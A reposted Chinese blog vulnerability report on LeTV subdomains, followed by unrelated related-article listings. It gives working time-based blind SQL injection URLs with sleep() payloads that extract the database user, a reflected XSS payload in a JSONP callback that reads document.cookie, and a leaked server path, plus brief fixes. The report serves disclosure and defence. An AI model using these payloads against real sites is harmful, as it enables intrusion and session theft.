mysql callback 事务性_乐视MySQL盲注、callback反射型XSS及一处绝对路径泄

最新推荐文章于 2023-04-26 16:00:31 发布
最新推荐文章于 2023-04-26 16:00:31 发布
阅读量227 收藏
点赞数
文章标签: mysql callback 事务性
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34581086/article/details/113424864
版权

注射点位于(参数ID):

http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=1&_=1408792945702

反射型XSS位于:

http://address.shop.letv.com/api/web/insert/insUserAddress.jsonp?callback=callback__%3Cimg%20src=aaaa%20οnerrοr=alert(document.cookie)%3E&

绝对路径泄漏位于:

http://joyearcars2014happy.hz.letv.com/php/joyearcar.php?callback=aaaa&username=

Notice: Undefined index: tel in /letv/joyearcars2014happy.hz.letv.com/php/joyearcar.php on line 11

测试过程

http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=if(length(user())>22,sleep(1),0)&_=1408792945702

可猜解当前连接用户的长度为23。

我只猜解了第一个字母的ASCII码为50,字母“2”:

http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=if(ascii(mid(user(),1,1))=50,sleep(1),2)–&_=1408792945702

非root,未进一步利用。

8862d6b6216c7235a0e4800e391dfab9.gif

修复方案:

解决SQL注射

编码callback

不显示详细错误信息

苏德中
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
TLS_CallBack.rar_TLS CALLBA_pe debugger_tlsCallback_tls_callba_手
09-19
漫谈TLS_CallBack:原理、编程、手工感染及检测.利用TLS_CallBack(线程局部存储回调函数)玩弄调试器以及感染PE文件.
Activity_Callback.rar_Callback android_activity Callback_android
09-19
android的callback自己看看吧
谈谈对于XSS跨站脚本攻击的学习(1)
2302_76827504的博客
04-17 289
最近学完XXE之后,对于这种恶意代码注入的漏洞提起来兴趣,想着现在正好趁热打铁,学习一下XSS,之前做题的时候看大师傅的wp一愣一愣的,不明白个所以然,这次系统的学习一下,在本文中将介绍有关XSS的知识点以及原理,也会介绍XSS的绕过姿势(这里参考了别的大师傅的思路,也给出了我自己的理解),希望给正在学习XSS的你有帮助。
XSS知识总结
weixin_64051447的博客
04-26 1669
HTML标签 等带src属性的标签都可以跨域加载资源,而不受同源策略的限制。每次加载时都会由浏览器发送一次GET请求,通过src属性加载的资源,浏览器会限制JavaScript的权限,使其不能读写返回的内容。
xss漏洞分析与利用
qq_34304107的博客
04-13 3326
一、寻找XSS1、找到可控参数URL参数输入表单HTTP头部信息(user-agent、ip、location、referrer等)2、找到参数输出点HTML标签JavaScript事件DOM3、精心构造payload二、利用BurpSuite实现自动化测试XSSValidator+phantomjs+xss.js1、burpsuite安装xss-validator插件2、安装phantomjs...
jsonp原理
xal
07-11 332
上面这段代码相当于向 http://localhost:3000/say?wd=Iloveyou&callback=show 这个地址请求数 据,然后后台返回 show(‘我不爱你’) ,最后会运行show()这个函数,打印出’我不爱你’
Web 攻防之业务安全:Callback自定义测试(触发XSS漏洞)
网络安全领域___专研者.
04-14 998
业务安全是指保护业务系统免受安全威胁的措施或手段。广义的业务安全应包括业务运行的软硬件平台(操作系统、数据库,中间件等)、业务系统自身(软件或设备)、业务所提供的服务安全;狭义的业务安全指业务系统自有的软件与服务的安全。
C_callback.zip_c callback_回调_回调函数
09-19
c语言回调函数,用简单的例子说明如何使用回调函数
JniCallback.zip_Android jni_android_jni android_jni callback_jni
09-14
实现了android 应用层和通过JNI层回调函数完成应用与native 本地代码之间的相互访问,对于了解JNI回调函数的用法有帮助
Java_JNI_Callback.rar_4 3 2 1_J2SDK1.4.0_Java_JNI_Callback_cl.dl
09-23
How to run: 1. compile Callback.java 2. compile the native code into a shared lib cl /Ie:\j2sdk1.4.0\include /Ie:\j2sdk1.4.0\include\win32 /LD /FeMyImpOfCallback.dll Callback.c 3. run: java Callback
callback自定义安全测试
weixin_42519551的博客
02-29 883
标题callback自定义测试 简要说明: 1.由于浏览器的同源策略(域名,协议,ip端口相同),非同源域名之间传递会存在限制。 2.JSONP(用于解决跨域数据传输的问题,利用了HTML里元素标签的开放策略src引入Js文件,远程调用动态生成JSON文件来实现数据传递,并以任意javascript的形式传递,一般使用 Callback(回调函数返回,由于没有使用白名单的方法进行限制Callbac...
存储XSS进阶 [猜测规则,利用Flash addCallback构造XSS]
weixin_34038652的博客
05-13 209
简要描述:有些时候,我们拿现成的XSS代码都不行,都被过滤了,那么需要我们对过滤的规则进行一定的判断与猜测。然后针对性的使用一些技巧来适应或者绕过规则。在本例中,我们以QQ空间/QQ校友的日志功能为例,通过猜测简单的过滤规则,然后使用含有addCallback的flash,来实现了存储XSS的构造。详细说明:1.前提:本例需在IE9,IE10下进行。2.我们乌云上报告的...
21. 存储XSS进阶 [猜测规则,利用Flash addCallback构造XSS]
→_→
05-26 350
作者:心伤的瘦子 来自:PKAV技术宅社区 网址:http://www.pkav.net -------------------------------------------------------------------------------------- 简要描述: 有些时候,我们拿现成的XSS代码都不行,都被过滤了,那么需要我们对过滤的规则进行一定的判断与猜测。然后针对性的使用一些技巧来适应或者绕过规则。 在本例中,我们以QQ空间/QQ校友的日志功能为例,通过猜测简单的过滤规则,然后使用
XSS攻击来得更猛烈些吧——一种新的绕过XSS防御的方法
cnbird's blog
10-21 2413
XSS攻击来得更猛烈些吧                                              一种新的绕过XSS防御的方法      大家都知道,普遍的防御XSS攻击的方法是在后台对以下字符进行转义:、’、”,但是经过本人的研究发现,在一些特殊场景下,即使对以上字符进行了转义,还是可以执行XSS攻击的。  首先看一个JS的例子:        var s
XSS安全漏洞修复解决方案
热门推荐
hold on the last
06-18 2万+
背景:等保测评公司针对我系统进行了一次渗透测试,并发现存在XSS漏洞,现记录修复过程。 框架:SSM。 全站XSS: 漏洞风险等级:中危 涉及页面:全站存在内容输入处 漏洞描述:所有模块可以修改内容处存在XSS,填入恶意代码后触发。 修复建议:过滤所有输入内容。(防止恶意弹窗/跨站脚本/过滤敏感字符/违法信息等) 解决方案 列举方案1:写个DispatcherServ...
jsonp跨域时如何解决xss漏洞
weixin_30693183的博客
02-14 281
解决安全性问题,主要涉及两点: (1) 前后端约定jsonp请求的js的回调函数名 (2) 服务器端指定返回的数据格式为json (3)进行referrer验证 ($_SERVER['HTTP_REFERER'] 中的host,是否在白名单内) 以下是事例代码: 1. 前端js发起ajax跨域jsonp请求: $.ajax({ type: "GET", ...
常见Flash XSS攻击方式
weixin_34261415的博客
03-08 1437
MayIKissYou · 2014/09/03 11:300x01 HTML中嵌入FLASH在HTML中嵌入FLASH的时候在IE和非IE浏览器下嵌入的方式有所不同,可以使用embed标签和object标签,使用如下的代码进行嵌入:IE下嵌入#!html <object codeBase="http://fpdownload.macromedia.com/get/Flashplayer/c...
【应用安全——XSS】修复建议
Fly_鹏程万里
02-22 4691
本身XSS输出位置不同,且可构造的Payload很多,一般是从一下三个角度来修复。 httponly 一般谈到cookie时,所对应的安全配置有httponly和secure。 Httponly:为了防止设置了该标志的cookie被JavaScript读取。 Secure:只能通过HTTPS使用,确保在从客户机传输到服务器时,cookie总是被加密的。 Jboss中可以在content....
jsonp安全攻防技术(JSON劫持、XSS漏洞)
tiancityycf的专栏
06-07 2778
关于 JSONP JSONP 全称是 JSON with Padding ,是基于 JSON 格式的为解决跨域请求资源而产生的解决方案。他实现的基本原理是利用了 HTML 里 <script></script> 元素标签,远程调用 JSON 文件来实现数据传递。如要在 a.com 域下获取存在 b.com 的 JSON 数据( getUsers.JSON ): {"id":"1","name":"名字"} 那么他们可以首先通过 JSONP 的“ Padding...
callback, callback_args, callback_kwargs = resolver_match 解包
最新发布
06-06
callback函数是指将一个函数作为参数传递给另一个函数,以在另一个函数中执行该函数的代码。在Django中,resolver_match是一个对象,它包含有关URL解析的信息。可以使用解包技术,将resolver_match对象分成三部分:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值